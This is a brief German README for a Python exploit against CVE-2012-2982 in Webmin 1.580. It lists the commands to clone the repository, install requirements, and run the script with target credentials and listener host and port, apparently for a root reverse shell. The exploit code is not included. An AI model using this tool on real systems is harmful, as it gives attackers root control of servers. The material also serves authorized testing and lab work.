
Python exploit for CVE-2012-2982
Dieses Python-Skript wurde für eine Schwachstelle in Webmin 1.580, CVE-2012-2982, geschrieben. Die Schwachstelle existiert in der Komponente /file/show.cgi und erlaubt einem authentifizierten Benutzer mit Zugriff auf das Dateimanager-Modul, beliebige Befehle mit Root-Rechten auszuführen.
Getestete Python-Version: Python 3.8.5
Erforderliches Pip-Paket: secrets
git clone https://github.com/OstojaOfficial/CVE-2012-2982.git
pip3 install -r requirements.txt
Um den Exploit auszuführen, verwenden Sie den folgenden Befehl:
python3 exploit.py <IP> <Username> <Password> <LHOST> <LPORT>